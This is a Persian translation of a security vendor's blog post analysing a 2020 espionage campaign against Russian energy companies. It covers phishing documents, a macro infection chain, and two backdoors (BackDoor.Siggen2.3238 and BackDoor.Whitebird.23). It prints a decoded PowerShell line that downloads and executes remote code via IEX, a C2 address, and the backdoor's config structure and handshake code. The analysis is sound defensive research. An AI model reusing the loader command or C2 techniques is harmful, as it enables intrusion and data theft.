ما در حال بررسی یک حمله جاسوسی هدفمند به مجتمع سوخت و انرژی روسیه هستیم

تجربه ما در بررسی حوادث امنیتی رایانه نشان می‌دهد که ایمیل هنوز یکی از رایج‌ترین کانال‌هایی است که مهاجمان برای نفوذ اولیه به زیرساخت‌های شبکه مورد حمله استفاده می‌کنند. یک اقدام سهل انگارانه با یک نامه مشکوک (یا نه چندان مشکوک) به یک نقطه ورود برای آلودگی بیشتر تبدیل می شود، به همین دلیل است که مجرمان سایبری به طور فعال از روش های مهندسی اجتماعی استفاده می کنند، البته با درجات موفقیت متفاوت.

در این پست می خواهیم در مورد تحقیقات اخیر خود در مورد یک کمپین هرزنامه که تعدادی از شرکت ها در مجتمع سوخت و انرژی روسیه را هدف قرار داده است صحبت کنیم. همه حملات با استفاده از ایمیل‌های جعلی سناریوی یکسانی را دنبال می‌کردند و به نظر می‌رسید هیچ‌کس تلاش زیادی برای محتوای متنی این ایمیل‌ها انجام نداده است.

سرویس اطلاعاتی

همه چیز در پایان آوریل 2020 شروع شد، زمانی که تحلیلگران ویروس دکتر وب یک کمپین هرزنامه را شناسایی کردند که در آن هکرها فهرست تلفنی به روز شده را برای کارمندان تعدادی از شرکت ها در مجتمع سوخت و انرژی روسیه ارسال کردند. البته، این یک نمایش ساده نگران کننده نبود، زیرا دایرکتوری واقعی نبود و اسناد .docx دو تصویر را از منابع راه دور دانلود کردند.

یکی از آنها از سرور news[.]zannews[.]com در رایانه کاربر دانلود شد. قابل ذکر است که نام دامنه مشابه دامنه مرکز رسانه ای مبارزه با فساد قزاقستان - zannews[.]kz است. از سوی دیگر، دامنه مورد استفاده بلافاصله یادآور کمپین دیگری در سال 2015 به نام TOPNEWS بود که از یک درپشتی ICEFOG استفاده می‌کرد و دامنه‌های کنترل تروجان با زیر رشته «اخبار» در نام آن‌ها وجود داشت. یکی دیگر از ویژگی‌های جالب این بود که هنگام ارسال ایمیل به گیرندگان مختلف، درخواست‌ها برای دانلود یک تصویر از پارامترهای درخواست متفاوت یا نام‌های منحصر به فرد تصویر استفاده می‌کردند.

ما معتقدیم که این کار به منظور جمع‌آوری اطلاعات برای شناسایی یک مخاطب «معتبر» انجام شده است، که پس از آن تضمین می‌شود که نامه را در زمان مناسب باز کند. پروتکل SMB برای دانلود تصویر از سرور دوم استفاده شد که می‌توان آن را برای جمع‌آوری هش‌های NetNTLM از رایانه‌های کارمندانی که سند دریافت‌شده را باز کردند، انجام داد.

و این هم خود نامه با دایرکتوری جعلی:

در ژوئن سال جاری، هکرها شروع به استفاده از نام دامنه جدید، sports[.]manhajnews[.]com برای آپلود تصاویر کردند. تجزیه و تحلیل نشان داد که زیر دامنه های manhajnews[.]com حداقل از سپتامبر 2019 در پست های هرزنامه استفاده شده است. یکی از اهداف این کمپین یک دانشگاه بزرگ روسیه بود.

همچنین، در ماه ژوئن، سازمان دهندگان حمله متن جدیدی برای نامه های خود ارائه کردند: این بار این سند حاوی اطلاعاتی در مورد توسعه صنعت بود. متن نامه به وضوح نشان می دهد که نویسنده آن یا زبان مادری روسی نبوده و یا عمداً چنین تصوری را در مورد خود ایجاد می کند. متأسفانه، ایده‌های توسعه صنعت، مثل همیشه، فقط یک پوشش بود - سند دوباره دو تصویر را دانلود کرد، در حالی که سرور به دانلود[.]inklingpaper[.]com تغییر یافت.

نوآوری بعدی در جولای دنبال شد. در تلاش برای دور زدن شناسایی اسناد مخرب توسط برنامه های آنتی ویروس، مهاجمان شروع به استفاده از اسناد Microsoft Word رمزگذاری شده با رمز عبور کردند. در همان زمان، مهاجمان تصمیم گرفتند از تکنیک مهندسی اجتماعی کلاسیک استفاده کنند - اعلان پاداش.

متن فرجام باز هم به همین سبک نوشته شد که شبهه مضاعفی را در مخاطب برانگیخت. سرور برای دانلود تصویر نیز تغییری نکرده است.

توجه داشته باشید که در همه موارد از صندوق پست الکترونیکی ثبت شده در دامنه های mail[.]ru و yandex[.]ru برای ارسال نامه استفاده می شد.

حمله

در اوایل سپتامبر 2020، زمان اقدام فرا رسیده بود. تحلیلگران ویروس ما موج جدیدی از حملات را ثبت کردند که در آن مهاجمان دوباره نامه هایی را به بهانه به روز رسانی فهرست تلفن ارسال کردند. با این حال، این بار پیوست حاوی یک ماکرو مخرب بود.

هنگام باز کردن سند پیوست، ماکرو دو فایل ایجاد کرد:

• اسکریپت VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs که برای راه اندازی یک فایل دسته ای در نظر گرفته شده بود.
• خود فایل دسته ای %APPDATA%configstest.bat که مبهم بود.

ماهیت کار آن به راه اندازی پوسته Powershell با پارامترهای خاص برمی گردد. پارامترهای ارسال شده به پوسته به دستورات رمزگشایی می شوند:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

طبق دستورات ارائه شده، دامنه ای که بارگیری از آن دریافت می شود، دوباره به عنوان یک سایت خبری مبدل می شود. یک ساده لودرکه تنها وظیفه آن دریافت shellcode از سرور فرمان و کنترل و اجرای آن است. ما توانستیم دو نوع درب پشتی قابل نصب بر روی رایانه شخصی قربانی را شناسایی کنیم.

BackDoor.Siggen2.3238

اولی است BackDoor.Siggen2.3238 - متخصصان ما قبلاً با آن برخورد نکرده بودند و همچنین هیچ اشاره ای به این برنامه توسط سایر فروشندگان آنتی ویروس وجود نداشت.

این برنامه یک Backdoor است که به زبان C++ نوشته شده و بر روی سیستم عامل های ویندوز 32 بیتی اجرا می شود.

BackDoor.Siggen2.3238 قادر است با استفاده از دو پروتکل HTTP و HTTPS با سرور مدیریت ارتباط برقرار کند. نمونه آزمایش شده از پروتکل HTTPS استفاده می کند. User-Agent زیر در درخواست ها به سرور استفاده می شود:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

در این حالت، تمام درخواست ها با مجموعه پارامترهای زیر ارائه می شوند:

%s;type=%s;length=%s;realdata=%send

که در آن هر خط %s به ترتیب با:

• شناسه کامپیوتر آلوده،
• نوع درخواست ارسالی،
• طول داده ها در قسمت realdata،
• داده ها.

در مرحله جمع آوری اطلاعات در مورد سیستم آلوده، درپشتی خطی مانند:

lan=%s;cmpname=%s;username=%s;version=%s;

جایی که lan آدرس IP رایانه آلوده است، cmpname نام رایانه است، نام کاربری نام کاربری، نسخه خط 0.0.4.03 است.

این اطلاعات با شناسه sysinfo از طریق یک درخواست POST به سرور کنترل واقع در https[:]//31.214[.]157.14/log.txt ارسال می شود. اگر در پاسخ BackDoor.Siggen2.3238 سیگنال HEART را دریافت می کند، اتصال موفق در نظر گرفته می شود و درب پشتی چرخه اصلی ارتباط با سرور را آغاز می کند.

شرح کامل تر اصول عملیات BackDoor.Siggen2.3238 در ما است کتابخانه ویروس.

BackDoor.Whitebird.23

برنامه دوم تغییری در BackDoor.Whitebird است که قبلاً از حادثه یک آژانس دولتی در قزاقستان برای ما شناخته شده است. این نسخه به زبان C++ نوشته شده و برای اجرا بر روی هر دو سیستم عامل ویندوز 32 بیتی و 64 بیتی طراحی شده است.

مانند اکثر برنامه های این نوع، BackDoor.Whitebird.23 طراحی شده برای ایجاد یک ارتباط رمزگذاری شده با سرور کنترل و کنترل غیرمجاز یک کامپیوتر آلوده. با استفاده از قطره چکان در یک سیستم در معرض خطر نصب می شود BackDoor.Siggen2.3244.

نمونه ای که ما بررسی کردیم یک کتابخانه مخرب با دو صادرات بود:

• گوگل پلی
• تست.

در ابتدای کار، پیکربندی سخت‌افزاری شده در بدنه درب پشتی را با استفاده از یک الگوریتم مبتنی بر عملیات XOR با بایت 0x99 رمزگشایی می‌کند. پیکربندی به نظر می رسد:

struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

برای اطمینان از عملکرد ثابت آن، درب پشتی مقدار مشخص شده در فیلد را تغییر می دهد ساعات کاری پیکربندی. این فیلد حاوی 1440 بایت است که مقادیر 0 یا 1 را می گیرد و هر دقیقه از هر ساعت در روز را نشان می دهد. یک رشته مجزا برای هر رابط شبکه ایجاد می کند که به رابط گوش می دهد و به دنبال بسته های مجوز در سرور پراکسی از رایانه آلوده می گردد. هنگامی که چنین بسته ای شناسایی می شود، درب پشتی اطلاعات مربوط به سرور پروکسی را به لیست خود اضافه می کند. علاوه بر این، وجود یک پروکسی را از طریق WinAPI بررسی می کند InternetQueryOptionW.

این برنامه دقیقه و ساعت جاری را بررسی می کند و آن را با داده های موجود در میدان مقایسه می کند ساعات کاری پیکربندی. اگر مقدار دقیقه مربوط به روز صفر نباشد، یک اتصال با سرور کنترل برقرار می شود.

برقراری ارتباط با سرور، ایجاد یک اتصال با استفاده از پروتکل TLS نسخه 1.0 بین مشتری و سرور را شبیه سازی می کند. بدنه درب پشتی شامل دو بافر است.

اولین بافر حاوی بسته TLS 1.0 Client Hello است.

بافر دوم شامل بسته های تبادل کلید مشتری TLS 1.0 با طول کلید 0x100 بایت، تغییر مشخصات رمز، پیام دست دادن رمزگذاری شده است.

هنگام ارسال بسته Client Hello، درب پشتی 4 بایت از زمان جاری و 28 بایت داده شبه تصادفی را در قسمت Client Random می نویسد که به صورت زیر محاسبه می شود:

v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

بسته دریافتی به سرور کنترل ارسال می شود. پاسخ (بسته سرور سلام) بررسی می کند:

• مطابقت با پروتکل TLS نسخه 1.0؛
• مطابقت مهر زمانی (4 بایت اول فیلد بسته داده تصادفی) مشخص شده توسط مشتری به مهر زمانی مشخص شده توسط سرور.
• مطابقت 4 بایت اول پس از مهر زمانی در قسمت داده تصادفی مشتری و سرور.

در صورت تطابق مشخص شده، Backdoor بسته Client Key Exchange را آماده می کند. برای انجام این کار، کلید عمومی را در بسته Client Key Exchange و همچنین Encryption IV و Encryption Data را در بسته Encrypted Handshake Message تغییر می دهد.

سپس درب پشتی بسته را از سرور فرمان و کنترل دریافت می کند، بررسی می کند که نسخه پروتکل TLS 1.0 باشد و سپس 54 بایت دیگر (بدنه بسته) را می پذیرد. این تنظیمات اتصال را کامل می کند.

شرح کامل تر اصول عملیات BackDoor.Whitebird.23 در ما است کتابخانه ویروس.

نتیجه گیری و نتیجه گیری

تجزیه و تحلیل اسناد، بدافزارها و زیرساخت های مورد استفاده به ما اجازه می دهد تا با اطمینان بگوییم که حمله توسط یکی از گروه های APT چینی تهیه شده است. با توجه به عملکرد درهای پشتی که در صورت حمله موفقیت آمیز بر روی رایانه های قربانیان نصب می شوند، آلودگی حداقل منجر به سرقت اطلاعات محرمانه از رایانه های سازمان های مورد حمله می شود.

علاوه بر این، یک سناریوی بسیار محتمل نصب تروجان های تخصصی بر روی سرورهای محلی با یک عملکرد خاص است. اینها می توانند کنترل کننده های دامنه، سرورهای ایمیل، دروازه های اینترنتی و غیره باشند. همانطور که در مثال مشاهده کردیم حادثه در قزاقستان، چنین سرورهایی به دلایل مختلف مورد توجه مهاجمان هستند.

منبع: www.habr.com